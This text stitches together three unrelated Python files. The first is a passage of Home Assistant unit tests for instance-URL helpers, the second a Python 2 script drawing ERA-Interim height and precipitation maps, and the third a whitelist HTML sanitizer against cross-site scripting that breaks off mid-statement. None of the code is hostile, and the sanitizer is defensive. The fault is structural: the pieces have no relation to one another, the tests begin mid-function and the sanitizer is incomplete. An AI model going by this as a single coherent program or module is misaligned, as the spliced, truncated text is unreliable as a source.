            == "http://192.168.0.1:8123"
        )
        with pytest.raises(NoURLAvailableError):
            _get_internal_url(hass, require_current_request=True, allow_ip=False)
        with pytest.raises(NoURLAvailableError):
            _get_internal_url(
                hass, require_current_request=True, require_standard_port=True
            )
        with pytest.raises(NoURLAvailableError):
            _get_internal_url(hass, require_current_request=True, require_ssl=True)
async def test_get_url_internal_fallback(hass: HomeAssistant):
    """Test getting an instance URL when the user has not set an internal URL.

    The helper should fall back to the API's local IP/port, omit standard
    ports, and refuse loopback addresses. Assertions are order-dependent:
    each block reconfigures hass.config.api in place.
    """
    assert hass.config.internal_url is None
    # No internal_url configured: fall back to the API's local IP and port.
    hass.config.api = Mock(use_ssl=False, port=8123, local_ip="192.168.123.123")
    assert _get_internal_url(hass) == "http://192.168.123.123:8123"
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, allow_ip=False)
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_standard_port=True)
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_ssl=True)
    # Standard HTTP port (80): the port suffix is omitted from the URL.
    hass.config.api = Mock(use_ssl=False, port=80, local_ip="192.168.123.123")
    assert _get_internal_url(hass) == "http://192.168.123.123"
    assert (
        _get_internal_url(hass, require_standard_port=True) == "http://192.168.123.123"
    )
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, allow_ip=False)
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_ssl=True)
    # With use_ssl=True the IP-based fallback is not offered; every variant raises.
    hass.config.api = Mock(use_ssl=True, port=443)
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass)
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_standard_port=True)
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, allow_ip=False)
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_ssl=True)
    # Do no accept any local loopback address as fallback
    hass.config.api = Mock(use_ssl=False, port=80, local_ip="127.0.0.1")
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass)
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_standard_port=True)
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, allow_ip=False)
    with pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_ssl=True)
async def test_get_url_external(hass: HomeAssistant):
    """Test getting an instance URL when the user has set an external URL.

    Covers URL normalization (standard ports and trailing slashes dropped),
    the require_* filters, and matching against the current request host.
    """
    assert hass.config.external_url is None
    # Without any configuration there is no current-request URL either.
    with pytest.raises(NoURLAvailableError):
        _get_external_url(hass, require_current_request=True)
    # Test with external URL: http://example.com:8123
    await async_process_ha_core_config(
        hass,
        {"external_url": "http://example.com:8123"},
    )
    assert hass.config.external_url == "http://example.com:8123"
    assert _get_external_url(hass) == "http://example.com:8123"
    assert _get_external_url(hass, allow_cloud=False) == "http://example.com:8123"
    assert _get_external_url(hass, allow_ip=False) == "http://example.com:8123"
    assert _get_external_url(hass, prefer_cloud=True) == "http://example.com:8123"
    with pytest.raises(NoURLAvailableError):
        _get_external_url(hass, require_standard_port=True)
    with pytest.raises(NoURLAvailableError):
        _get_external_url(hass, require_ssl=True)
    with pytest.raises(NoURLAvailableError):
        _get_external_url(hass, require_current_request=True)
    # require_current_request succeeds only when the request host matches.
    with patch(
        "homeassistant.helpers.network._get_request_host", return_value="example.com"
    ):
        assert (
            _get_external_url(hass, require_current_request=True)
            == "http://example.com:8123"
        )
        with pytest.raises(NoURLAvailableError):
            _get_external_url(
                hass, require_current_request=True, require_standard_port=True
            )
        with pytest.raises(NoURLAvailableError):
            _get_external_url(hass, require_current_request=True, require_ssl=True)
    with patch(
        "homeassistant.helpers.network._get_request_host",
        return_value="no_match.example.com",
    ), pytest.raises(NoURLAvailableError):
        _get_external_url(hass, require_current_request=True)
    # Test with external URL: http://example.com:80/
    await async_process_ha_core_config(
        hass,
        {"external_url": "http://example.com:80/"},
    )
    assert hass.config.external_url == "http://example.com:80/"
    # Standard port and trailing slash are normalized away.
    assert _get_external_url(hass) == "http://example.com"
    assert _get_external_url(hass, allow_cloud=False) == "http://example.com"
    assert _get_external_url(hass, allow_ip=False) == "http://example.com"
    assert _get_external_url(hass, prefer_cloud=True) == "http://example.com"
    assert _get_external_url(hass, require_standard_port=True) == "http://example.com"
    with pytest.raises(NoURLAvailableError):
        _get_external_url(hass, require_ssl=True)
    # Test with external url: https://example.com:443/
    await async_process_ha_core_config(
        hass,
        {"external_url": "https://example.com:443/"},
    )
    assert hass.config.external_url == "https://example.com:443/"
    assert _get_external_url(hass) == "https://example.com"
    assert _get_external_url(hass, allow_cloud=False) == "https://example.com"
    assert _get_external_url(hass, allow_ip=False) == "https://example.com"
    assert _get_external_url(hass, prefer_cloud=True) == "https://example.com"
    assert _get_external_url(hass, require_ssl=False) == "https://example.com"
    assert _get_external_url(hass, require_standard_port=True) == "https://example.com"
    # Test with external URL: https://example.com:80
    await async_process_ha_core_config(
        hass,
        {"external_url": "https://example.com:80"},
    )
    assert hass.config.external_url == "https://example.com:80"
    # https on port 80 is non-standard: the port stays in the URL.
    assert _get_external_url(hass) == "https://example.com:80"
    assert _get_external_url(hass, allow_cloud=False) == "https://example.com:80"
    assert _get_external_url(hass, allow_ip=False) == "https://example.com:80"
    assert _get_external_url(hass, prefer_cloud=True) == "https://example.com:80"
    assert _get_external_url(hass, require_ssl=True) == "https://example.com:80"
    with pytest.raises(NoURLAvailableError):
        _get_external_url(hass, require_standard_port=True)
    # Test with external URL: https://192.168.0.1
    await async_process_ha_core_config(
        hass,
        {"external_url": "https://192.168.0.1"},
    )
    assert hass.config.external_url == "https://192.168.0.1"
    assert _get_external_url(hass) == "https://192.168.0.1"
    assert _get_external_url(hass, allow_cloud=False) == "https://192.168.0.1"
    assert _get_external_url(hass, prefer_cloud=True) == "https://192.168.0.1"
    assert _get_external_url(hass, require_standard_port=True) == "https://192.168.0.1"
    with pytest.raises(NoURLAvailableError):
        _get_external_url(hass, allow_ip=False)
    with pytest.raises(NoURLAvailableError):
        _get_external_url(hass, require_ssl=True)
    with patch(
        "homeassistant.helpers.network._get_request_host", return_value="192.168.0.1"
    ):
        assert (
            _get_external_url(hass, require_current_request=True)
            == "https://192.168.0.1"
        )
        with pytest.raises(NoURLAvailableError):
            _get_external_url(hass, require_current_request=True, allow_ip=False)
        with pytest.raises(NoURLAvailableError):
            _get_external_url(hass, require_current_request=True, require_ssl=True)
async def test_get_cloud_url(hass: HomeAssistant):
    """Test getting an instance URL from the Nabu Casa cloud component.

    The cloud URL is whatever async_remote_ui_url reports; it only counts
    as "current" when the live request host matches that hostname, and it
    is unavailable when the cloud subscription raises CloudNotAvailable.
    """
    assert hass.config.external_url is None
    hass.config.components.add("cloud")
    with patch.object(
        hass.components.cloud,
        "async_remote_ui_url",
        return_value="https://example.nabu.casa",
    ):
        assert _get_cloud_url(hass) == "https://example.nabu.casa"
        # No request in flight: require_current_request must fail.
        with pytest.raises(NoURLAvailableError):
            _get_cloud_url(hass, require_current_request=True)
        with patch(
            "homeassistant.helpers.network._get_request_host",
            return_value="example.nabu.casa",
        ):
            assert (
                _get_cloud_url(hass, require_current_request=True)
                == "https://example.nabu.casa"
            )
        with patch(
            "homeassistant.helpers.network._get_request_host",
            return_value="no_match.nabu.casa",
        ), pytest.raises(NoURLAvailableError):
            _get_cloud_url(hass, require_current_request=True)
    # Cloud subscription unavailable: no cloud URL is offered at all.
    with patch.object(
        hass.components.cloud,
        "async_remote_ui_url",
        side_effect=cloud.CloudNotAvailable,
    ), pytest.raises(NoURLAvailableError):
        _get_cloud_url(hass)
async def test_get_external_url_cloud_fallback(hass: HomeAssistant):
    """Test getting an external instance URL with cloud fallback.

    When the configured external URL fails a constraint (IP not allowed,
    SSL required, standard port required) the cloud URL steps in; when the
    configured URL already satisfies the constraint it wins unless
    prefer_cloud is set.
    """
    assert hass.config.external_url is None
    # Test with external URL: http://1.1.1.1:8123
    await async_process_ha_core_config(
        hass,
        {"external_url": "http://1.1.1.1:8123"},
    )
    assert hass.config.external_url == "http://1.1.1.1:8123"
    assert _get_external_url(hass, prefer_cloud=True) == "http://1.1.1.1:8123"
    # Add Cloud to the previous test
    hass.config.components.add("cloud")
    with patch.object(
        hass.components.cloud,
        "async_remote_ui_url",
        return_value="https://example.nabu.casa",
    ):
        # The IP-based URL fails allow_ip/ssl/standard-port, so cloud wins there.
        assert _get_external_url(hass, allow_cloud=False) == "http://1.1.1.1:8123"
        assert _get_external_url(hass, allow_ip=False) == "https://example.nabu.casa"
        assert _get_external_url(hass, prefer_cloud=False) == "http://1.1.1.1:8123"
        assert _get_external_url(hass, prefer_cloud=True) == "https://example.nabu.casa"
        assert _get_external_url(hass, require_ssl=True) == "https://example.nabu.casa"
        assert (
            _get_external_url(hass, require_standard_port=True)
            == "https://example.nabu.casa"
        )
    # Test with external URL: https://example.com
    await async_process_ha_core_config(
        hass,
        {"external_url": "https://example.com"},
    )
    assert hass.config.external_url == "https://example.com"
    assert _get_external_url(hass, prefer_cloud=True) == "https://example.com"
    # Add Cloud to the previous test
    hass.config.components.add("cloud")
    with patch.object(
        hass.components.cloud,
        "async_remote_ui_url",
        return_value="https://example.nabu.casa",
    ):
        assert _get_external_url(hass, allow_cloud=False) == "https://example.com"
        assert _get_external_url(hass, allow_ip=False) == "https://example.com"
        assert _get_external_url(hass, prefer_cloud=False) == "https://example.com"
        assert _get_external_url(hass, prefer_cloud=True) == "https://example.nabu.casa"
        assert _get_external_url(hass, require_ssl=True) == "https://example.com"
        assert (
            _get_external_url(hass, require_standard_port=True) == "https://example.com"
        )
        # allow_cloud=False overrides prefer_cloud=True.
        assert (
            _get_external_url(hass, prefer_cloud=True, allow_cloud=False)
            == "https://example.com"
        )
async def test_get_url(hass: HomeAssistant):
    """Test getting an instance URL via the public get_url helper.

    Exercises the internal/external preference and allowance flags, and
    matching the configured URLs against the current request host.
    """
    assert hass.config.external_url is None
    assert hass.config.internal_url is None
    with pytest.raises(NoURLAvailableError):
        get_url(hass)
    # The API's local-IP fallback counts as an internal URL.
    hass.config.api = Mock(use_ssl=False, port=8123, local_ip="192.168.123.123")
    assert get_url(hass) == "http://192.168.123.123:8123"
    assert get_url(hass, prefer_external=True) == "http://192.168.123.123:8123"
    with pytest.raises(NoURLAvailableError):
        get_url(hass, allow_internal=False)
    # Test only external
    hass.config.api = None
    await async_process_ha_core_config(
        hass,
        {"external_url": "https://example.com"},
    )
    assert hass.config.external_url == "https://example.com"
    assert hass.config.internal_url is None
    assert get_url(hass) == "https://example.com"
    # Test preference or allowance
    await async_process_ha_core_config(
        hass,
        {"internal_url": "http://example.local", "external_url": "https://example.com"},
    )
    assert hass.config.external_url == "https://example.com"
    assert hass.config.internal_url == "http://example.local"
    # Internal is the default preference when both are set.
    assert get_url(hass) == "http://example.local"
    assert get_url(hass, prefer_external=True) == "https://example.com"
    assert get_url(hass, allow_internal=False) == "https://example.com"
    assert (
        get_url(hass, prefer_external=True, allow_external=False)
        == "http://example.local"
    )
    with pytest.raises(NoURLAvailableError):
        get_url(hass, allow_external=False, require_ssl=True)
    with pytest.raises(NoURLAvailableError):
        get_url(hass, allow_external=False, allow_internal=False)
    with pytest.raises(NoURLAvailableError):
        get_url(hass, require_current_request=True)
    # Request host matching selects whichever configured URL it matches.
    with patch(
        "homeassistant.helpers.network._get_request_host", return_value="example.com"
    ), patch("homeassistant.components.http.current_request"):
        assert get_url(hass, require_current_request=True) == "https://example.com"
        assert (
            get_url(hass, require_current_request=True, require_ssl=True)
            == "https://example.com"
        )
        with pytest.raises(NoURLAvailableError):
            get_url(hass, require_current_request=True, allow_external=False)
    with patch(
        "homeassistant.helpers.network._get_request_host", return_value="example.local"
    ), patch("homeassistant.components.http.current_request"):
        assert get_url(hass, require_current_request=True) == "http://example.local"
        with pytest.raises(NoURLAvailableError):
            get_url(hass, require_current_request=True, allow_internal=False)
        with pytest.raises(NoURLAvailableError):
            get_url(hass, require_current_request=True, require_ssl=True)
    # NOTE(review): this final case calls _get_internal_url rather than
    # get_url — possibly a carry-over from the internal-URL test; confirm
    # it is intentional before relying on it.
    with patch(
        "homeassistant.helpers.network._get_request_host",
        return_value="no_match.example.com",
    ), pytest.raises(NoURLAvailableError):
        _get_internal_url(hass, require_current_request=True)
async def test_get_request_host(hass: HomeAssistant):
    """Test extracting the host portion of the current web request's URL."""
    # Without a request in context the helper must raise.
    with pytest.raises(NoURLAvailableError):
        _get_request_host()
    # With a faked current request, only the hostname (no port/path) is returned.
    with patch("homeassistant.components.http.current_request") as request_context:
        fake_request = Mock()
        fake_request.url = "http://example.com:8123/test/request"
        request_context.get = Mock(return_value=fake_request)
        assert _get_request_host() == "example.com"
async def test_get_current_request_url_with_known_host(
    hass: HomeAssistant, current_request
):
    """Test getting current request URL with known hosts addresses.

    localhost, loopback IPs, and the Supervisor-reported hostname (plus its
    .local variant) are accepted as "current"; unknown hosts are rejected.
    """
    hass.config.api = Mock(use_ssl=False, port=8123, local_ip="127.0.0.1")
    assert hass.config.internal_url is None
    with pytest.raises(NoURLAvailableError):
        get_url(hass, require_current_request=True)
    # Ensure we accept localhost
    with patch(
        "homeassistant.helpers.network._get_request_host", return_value="localhost"
    ):
        assert get_url(hass, require_current_request=True) == "http://localhost:8123"
        with pytest.raises(NoURLAvailableError):
            get_url(hass, require_current_request=True, require_ssl=True)
        with pytest.raises(NoURLAvailableError):
            get_url(hass, require_current_request=True, require_standard_port=True)
    # Ensure we accept local loopback ip (e.g., 127.0.0.1)
    with patch(
        "homeassistant.helpers.network._get_request_host", return_value="127.0.0.8"
    ):
        assert get_url(hass, require_current_request=True) == "http://127.0.0.8:8123"
        with pytest.raises(NoURLAvailableError):
            get_url(hass, require_current_request=True, allow_ip=False)
    # Ensure hostname from Supervisor is accepted transparently
    mock_component(hass, "hassio")
    hass.components.hassio.is_hassio = Mock(return_value=True)
    hass.components.hassio.get_host_info = Mock(
        return_value={"hostname": "homeassistant"}
    )
    with patch(
        "homeassistant.helpers.network._get_request_host",
        return_value="homeassistant.local",
    ):
        assert (
            get_url(hass, require_current_request=True)
            == "http://homeassistant.local:8123"
        )
    with patch(
        "homeassistant.helpers.network._get_request_host",
        return_value="homeassistant",
    ):
        assert (
            get_url(hass, require_current_request=True) == "http://homeassistant:8123"
        )
    # Unknown hosts are rejected even when a request is in flight.
    with patch(
        "homeassistant.helpers.network._get_request_host", return_value="unknown.local"
    ), pytest.raises(NoURLAvailableError):
        get_url(hass, require_current_request=True)
async def test_is_internal_request(hass: HomeAssistant):
    """Test if accessing an instance on its internal URL.

    is_internal_request compares the current request host against the
    configured internal_url's host (hostname or IP).
    """
    # Test with internal URL: http://example.local:8123
    await async_process_ha_core_config(
        hass,
        {"internal_url": "http://example.local:8123"},
    )
    assert hass.config.internal_url == "http://example.local:8123"
    # Outside a request context there is nothing to match against.
    assert not is_internal_request(hass)
    with patch(
        "homeassistant.helpers.network._get_request_host", return_value="example.local"
    ):
        assert is_internal_request(hass)
    with patch(
        "homeassistant.helpers.network._get_request_host",
        return_value="no_match.example.local",
    ):
        assert not is_internal_request(hass)
    # Test with internal URL: http://192.168.0.1:8123
    await async_process_ha_core_config(
        hass,
        {"internal_url": "http://192.168.0.1:8123"},
    )
    assert hass.config.internal_url == "http://192.168.0.1:8123"
    assert not is_internal_request(hass)
    with patch(
        "homeassistant.helpers.network._get_request_host", return_value="192.168.0.1"
    ):
        assert is_internal_request(hass)
|
|
import matplotlib
#matplotlib.use('Agg') # Must be before importing matplotlib.pyplot or pylab!
from matplotlib import rc
from matplotlib.font_manager import FontProperties
from matplotlib import rcParams
from matplotlib import cm
from mpl_toolkits.basemap import Basemap
from mpl_toolkits.basemap import cm
import cPickle as pickle
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.colors as colors
from matplotlib.patches import Polygon
import scipy.interpolate
import datetime
import pdb
import gc
# --- Matplotlib/LaTeX text rendering setup (Python 2 script) -----------------
rc('font', family = 'serif', serif = 'cmr10')
rc('text', usetex=True)
rcParams['text.usetex']=True
rcParams['text.latex.unicode']=True
rcParams['font.family']='serif'
rcParams['font.serif']='cmr10'
rcParams['font.weight']='normal'
rcParams['text.color']='#262626'
# Pressure levels (hPa) to plot; height-contour limits are only defined for
# the levels handled by the if/elif chain in the main loop below.
#plot_levels = [925, 850, 700, 500]
plot_levels = [925]
plot_type='mean'
# Selects which filled-contour branch runs in the main loop below.
plot_diag='precip'
# Precipitation colour-fill limits used by the 'precip' branch.
clevpr_min = 0.
clevpr_max = 3.
# Map window, degrees.
lon_high_plot = 102
lon_low_plot = 64
lat_high_plot= 30.
lat_low_plot=-10
divisor=10 # for lat/lon rounding
# Daily ERA-Interim fields pre-saved as numpy .npz archives.
geop_file = np.load('/nfs/a90/eepdw/Data/Era_Interim/Era_Interim_Daily_Geopotential_Height_EMBRACE_Period.npz')
precip_file = np.load('/nfs/a90/eepdw/Data/Era_Interim/Era_Interim_Daily_Total_Precip_EMBRACE_Period.npz')
# convert geopotential to geopotential height
# Calculate total at each lat,lon position
#mean_dom = np.mean(pcp_dom, axis=0)
#sum_dom = np.sum(pcp_dom, axis=0)
#lons= longitude_domsingle[:]
#lats = latitude_domsingle[:]
#lon_low= np.min(lons)
#lon_high = np.max(lons)
#lat_low = np.min(lats)
#lat_high = np.max(lats)
#lons,lats = np.meshgrid(lons, lats)
geopotential = geop_file['data']
variable = precip_file['data']
lons_geop = geop_file['longitudes']
lats_geop = geop_file['latitudes']
lons_var = precip_file['longitudes']
lats_var = precip_file['latitudes']
pressure_levels = geop_file['pressures']
# Parse the ISO date strings once; used to align the two datasets by day.
geop_dates=[datetime.datetime.strptime(g, '%Y-%m-%d') for g in geop_file['time_coords']]
var_dates=[datetime.datetime.strptime(g, '%Y-%m-%d') for g in precip_file['time_coords']]
#pdb.set_trace()
# Main loop: one map per (pressure level, day) combination. Python 2 only
# (print statement; Basemap toolkit).
for p in plot_levels:
    # Find index of plot level in datasets
    # (pressure_levels appears to be stored descending; searchsorted needs
    # ascending, hence the [::-1] and the -(s+1) index below — verify.)
    s = np.searchsorted(pressure_levels[::-1], p)
    for date in geop_dates:
        # Align the geopotential and precipitation records for this day.
        dg = np.searchsorted(geop_dates, date)
        dv = np.searchsorted(var_dates, date)
        # Get plot grids on pressure level
        # /9.81 to convert geopotential to geopotential height
        plt_h = geopotential[dg, -(s+1),:,:]/9.81
        #plt_v = variable[-(s+1),:,:]
        plt_v = variable[dv,:,:]
        # Set pressure height contour min/max
        if p == 925:
            clev_min = 660.
            clev_max = 810.
        elif p == 850:
            clev_min = 1435.
            clev_max = 1530.
        elif p == 700:
            clev_min = 3090.
            clev_max = 3155.
        elif p == 500:
            clev_min = 5800.
            clev_max = 5890.
        else:
            # NOTE(review): execution continues with the previous level's
            # limits (or a NameError on the first level) — confirm intended.
            print 'Contour min/max not set for this pressure level'
        m_title = 'Height of %s-hPa level (m)' % (p)
        # Set precip min/max
        clevs_lin = np.arange(clev_min, clev_max, 5)
        m =\
            Basemap(llcrnrlon=lon_low_plot,llcrnrlat=lat_low_plot,urcrnrlon=lon_high_plot,urcrnrlat=lat_high_plot,projection='mill', rsphere=6371229)
        #pdb.set_trace()
        # Project lat/lon grids into map coordinates.
        x, y = m(lons_geop, lats_geop)
        x_v, y_v = m(lons_var, lats_var)
        fig=plt.figure(figsize=(8,8))
        ax = fig.add_axes([0.05,0.05,0.9,0.85])
        # draw coastlines, state and country boundaries, edge of map.
        m.drawcoastlines(linewidth=0.5,color='#262626')
        #m.drawstates()
        m.drawcountries(linewidth=0.5,color='#262626')
        # draw parallels.
        parallels = np.arange(0.,90,divisor)
        m.drawparallels(parallels,labels=[1,0,0,0],fontsize=10, color='#262626' )
        # draw meridians
        meridians = np.arange(0.,360., divisor)
        m.drawmeridians(meridians,labels=[0,0,0,1],fontsize=10, color='#262626')
        #ny = mean_dom.shape[0]; nx = mean_dom.shape[1]
        #lons, lats = m.makegrid(longitude_dom[1,:], latitude_dom[1,:]) # get lat/lons of ny by nx evenly space grid.
        # draw geopotential contour lines
        cs_lin = m.contour(x,y, plt_h, clevs_lin,colors='#262626',linewidths=0.5)
        # Filled contours for the chosen diagnostic. Only the 'precip'
        # branch is self-contained; the other branches reference
        # clevpt_*/clevsh_* limits not defined in this script —
        # NOTE(review): they would raise NameError if selected.
        if plot_diag=='precip':
            clevspt_nums=64
            plt_v = np.ma.masked_outside(plt_v, clevpr_max+0.5, clevpr_min-0.5)
            tick_gap=0.2
            # NOTE(review): *1000/6 presumably converts 6-hourly totals in
            # metres to mm h^-1 — verify units against the source data.
            cs_col = m.contourf(x_v,y_v, plt_v*1000/6, np.linspace(clevpr_min, clevpr_max, clevspt_nums), cmap=cm.s3pcpn_l, extend='both')
            #cbar = m.colorbar(cs_col,location='bottom',pad="5%")
            #cbar.ax.tick_params(labelsize=12, colors='#262626')
            tick_gap=0.5
            #ticks= np.arange(int(clevpr_min),int(clevpr_max)+tick_gap,tick_gap)
            #cbar.set_ticks(ticks, update_ticks=True)
            #cbar.set_ticklabels(([r"${%s}$" % x for x in ticks]))
            #cbar.set_label('Precipitation mm h$^{-1}$', fontsize=12, color='#262626')
            #plt.suptitle('Height of %s hPa, and Total Precipitation' % (p), fontsize=16, color='#262626')
        elif plot_diag=='temperature':
            clevspt_nums=clevpt_max-clevpt_min+1
            plt_v = np.ma.masked_outside(plt_v, clevpt_max+20, clevpt_min-20)
            tick_gap=2
            cs_col = m.contourf(x,y, plt_v, np.linspace(clevpt_min, clevpt_max, clevspt_nums), cmap=plt.cm.jet, extend='both')
            cbar = m.colorbar(cs_col,location='bottom',pad="5%")
            #cbar.ax.tick_params(labelsize=12, colors='#262626')
            tick_gap=2
            ticks= np.arange(int(clevpt_min),int(clevpt_max)+tick_gap,tick_gap)
            cbar.set_ticks(ticks, update_ticks=True)
            cbar.set_ticklabels(([r"${%s}$" % x for x in ticks]))
            cbar.set_label('Potential Temperature ${\\theta}$(K)', fontsize=12, color='#262626')
            plt.suptitle('Height, Potential Temperature and Wind Vectors at %s hPa'% (p), fontsize=16, color='#262626')
        elif plot_diag=='sphum':
            clevssh_nums=clevpt_max-clevpt_min+1
            plt_v = np.ma.masked_outside(plt_v, clevsh_max+20, clevsh_min-20)
            cs_col = m.contourf(x,y, plt_v, np.linspace(clevsh_min, clevsh_max, clevssh_nums), cmap=plt.cm.jet_r, extend='both')
            cbar = m.colorbar(cs_col,location='bottom',pad="5%", format = '%.3f')
            tick_gap=0.002
            ticks= np.arange(clevsh_min,clevsh_max+tick_gap,tick_gap)
            cbar.set_ticks(ticks)
            cbar.set_ticklabels((["${%.3f}$" % x for x in ticks]) )
            cbar.set_label('Specific Humidity ${\\phi}$(kg/kg)', fontsize=12, color='#262626')
            plt.suptitle('Height, Specific Humidity and Wind Vectors at %s hPa'% (p), fontsize=16, color='#262626')
        elif plot_diag=='vort':
            clevvort_min = -5
            clevvort_max = 5
            cs_col = m.contourf(x,y, plt_v*(10**5), np.linspace(clevvort_min, clevvort_max), cmap=plt.cm.RdBu_r, extend='both')
            cbar = m.colorbar(cs_col,location='bottom',pad="5%", format = '%i')
            tick_gap=1
            ticks= np.arange(clevvort_min,clevvort_max+tick_gap,tick_gap)
            cbar.set_ticks(ticks)
            cbar.set_ticklabels((["${%i}$" % x for x in ticks]) )
            cbar.set_label('Relative Vorticity (${10^{-5}\ s^{-1}}$)', fontsize=12, color='#262626')
            plt.suptitle('Height, Relative Vorticity and Wind Vectors at %s hPa'% (p), fontsize=16, color='#262626')
        elif plot_diag=='ptvort':
            clevvort_min = -0.1
            clevvort_max = 0.5
            cs_col = m.contourf(x,y, plt_v*(10**6), np.linspace(clevvort_min, clevvort_max), cmap=plt.cm.RdBu_r, extend='both')
            cbar = m.colorbar(cs_col,location='bottom',pad="5%")
            #K m**2 kg**-1 s**-1
            tick_gap=0.1
            ticks= np.arange(clevvort_min,clevvort_max+tick_gap,tick_gap)
            cbar.set_ticks(ticks)
            cbar.set_ticklabels((["${%.1f}$" % x for x in ticks]) )
            cbar.set_label('Potential Vorticity (${K\ m^{2}\ kg^{-1}\ s^{-1}}$)', fontsize=12, color='#262626')
            plt.suptitle('Height, Potential Vorticity and Wind Vectors at %s hPa'% (p), fontsize=16, color='#262626')
        elif plot_diag=='div':
            clevvort_min = -1.5
            clevvort_max = 1.5
            cs_col = m.contourf(x,y, plt_v*(10**5), np.linspace(clevvort_min, clevvort_max), cmap=plt.cm.RdBu_r, extend='both')
            cbar = m.colorbar(cs_col,location='bottom',pad="5%")
            tick_gap=0.3
            ticks= np.arange(clevvort_min,clevvort_max+tick_gap,tick_gap)
            cbar.set_ticks(ticks)
            cbar.set_ticklabels((["${%.1f}$" % x for x in ticks]) )
            cbar.set_label('Divergence of Wind (${s^{-1}}$)', fontsize=12, color='#262626')
            plt.suptitle('Height, Divergence and Wind Vectors at %s hPa'% (p), fontsize=16, color='#262626')
        # Label the geopotential-height contour lines.
        plt.clabel(cs_lin, fontsize=10, fmt="${%i}$", color='#262626')
        # cbar.ax.tick_params(labelsize=10, color='#262626', ')
        plt.title('%s UTC' % (datetime.datetime.strftime(date, '%d%b')))
        #plt.show()
        plt.savefig('/nfs/a90/eepdw/Figures/ERA_Interim/Era_Interim_mean_EMBRACE_period_%shPa_height_and_rain_by_day_%s_%s_shorttitle.png' % (p,plot_diag, datetime.datetime.strftime(date, '%d%b')), format='png', bbox_inches='tight')
        # Free figure memory between the many per-day plots.
        plt.clf()
        plt.close()
        gc.collect()
#plt.title('TRMM Ra for EMBRACE Period ' , fontsize=16, color='#262626')
#plt.savefig('/nfs/a90/eepdw/Figures/ERA_Interim/Era_Interim_mean_EMBRACE_period_%shPa_%s.png' % (p,plot_diag), format='png', bbox_inches='tight')
#plt.suptitle('', visible=False)
#plt.savefig('/nfs/a90/eepdw/Figures/ERA_Interim/Era_Interim_mean_EMBRACE_period_%shPa_%s_notitle.png' % (p,plot_diag), format='png', bbox_inches='tight')
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
::
# from http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/496942
# Title: Cross-site scripting (XSS) defense
# Submitter: Josh Goldfoot (other recipes)
# Last Updated: 2006/08/05
# Version no: 1.0
"""
from htmllib import HTMLParser
from cgi import escape
from urlparse import urlparse
from formatter import AbstractFormatter
from htmlentitydefs import entitydefs
from xml.sax.saxutils import quoteattr
__all__ = ['sanitize']
def xssescape(text):
    """Gets rid of < and > and & and, for good measure, ':'.

    Escapes angle brackets, ampersands and quotes via cgi.escape, then
    turns ':' into its numeric character reference so 'javascript:'-style
    payloads cannot survive in re-emitted text/attributes.
    """
    # Bug fix: the original `.replace(':', ':')` replaced a colon with
    # itself (a mojibake'd '&#58;'), making the colon defense a no-op.
    return escape(text, quote=True).replace(':', '&#58;')
class XssCleaner(HTMLParser):
    """Whitelist-based HTML sanitizer built on Python 2's htmllib.

    Feed it (X)HTML via strip(); tags/attributes not on the whitelist are
    either escaped into visible text or, when strip_disallowed is set,
    dropped entirely. Sanitized output accumulates in self.result.
    """

    def __init__(
        self,
        permitted_tags=[
            'a',
            'b',
            'blockquote',
            'br/',
            'i',
            'li',
            'ol',
            'ul',
            'p',
            'cite',
            'code',
            'pre',
            'img/',
        ],
        allowed_attributes={'a': ['href', 'title'], 'img': ['src', 'alt'
                            ], 'blockquote': ['type']},
        fmt=AbstractFormatter,
        strip_disallowed = False
    ):
        # NOTE(review): the mutable defaults above are shared across all
        # instances; they are not mutated here, but callers must not
        # modify them in place.
        HTMLParser.__init__(self, fmt)
        self.result = ''
        # Stack (most recent first) of currently open permitted tags.
        self.open_tags = []
        # A trailing '/' marks a tag that needs no closing tag (e.g. 'br/').
        self.permitted_tags = [i for i in permitted_tags if i[-1] != '/']
        self.requires_no_close = [i[:-1] for i in permitted_tags
                                  if i[-1] == '/']
        self.permitted_tags += self.requires_no_close
        self.allowed_attributes = allowed_attributes
        # The only schemes allowed in URLs (for href and src attributes).
        # Adding "javascript" or "vbscript" to this list would not be smart.
        self.allowed_schemes = ['http', 'https', 'ftp']
        #to strip or escape disallowed tags?
        self.strip_disallowed = strip_disallowed
        # True while inside a disallowed element when stripping.
        self.in_disallowed = False

    def handle_data(self, data):
        """Escape text content unless it sits inside a stripped element."""
        if data and not self.in_disallowed:
            self.result += xssescape(data)

    def handle_charref(self, ref):
        """Pass through plausible numeric character refs; escape the rest."""
        if self.in_disallowed:
            return
        elif len(ref) < 7 and ref.isdigit():
            self.result += '&#%s;' % ref
        else:
            self.result += xssescape('&#%s' % ref)

    def handle_entityref(self, ref):
        """Pass through known named entities; escape unknown ones."""
        if self.in_disallowed:
            return
        elif ref in entitydefs:
            self.result += '&%s;' % ref
        else:
            self.result += xssescape('&%s' % ref)

    def handle_comment(self, comment):
        """Re-emit comments escaped so they cannot smuggle live markup."""
        if self.in_disallowed:
            return
        elif comment:
            self.result += xssescape('<!--%s-->' % comment)

    def handle_starttag(
        self,
        tag,
        method,
        attrs,
    ):
        """Re-emit a permitted start tag keeping only whitelisted
        attributes; escape or strip disallowed tags."""
        if tag not in self.permitted_tags:
            if self.strip_disallowed:
                self.in_disallowed = True
            else:
                self.result += xssescape('<%s>' % tag)
        else:
            bt = '<' + tag
            if tag in self.allowed_attributes:
                attrs = dict(attrs)
                self.allowed_attributes_here = [x for x in
                    self.allowed_attributes[tag] if x in attrs
                    and len(attrs[x]) > 0]
                for attribute in self.allowed_attributes_here:
                    if attribute in ['href', 'src', 'background']:
                        # URL-bearing attributes must pass the scheme check;
                        # failing ones are dropped silently.
                        if self.url_is_acceptable(attrs[attribute]):
                            bt += ' %s="%s"' % (attribute,
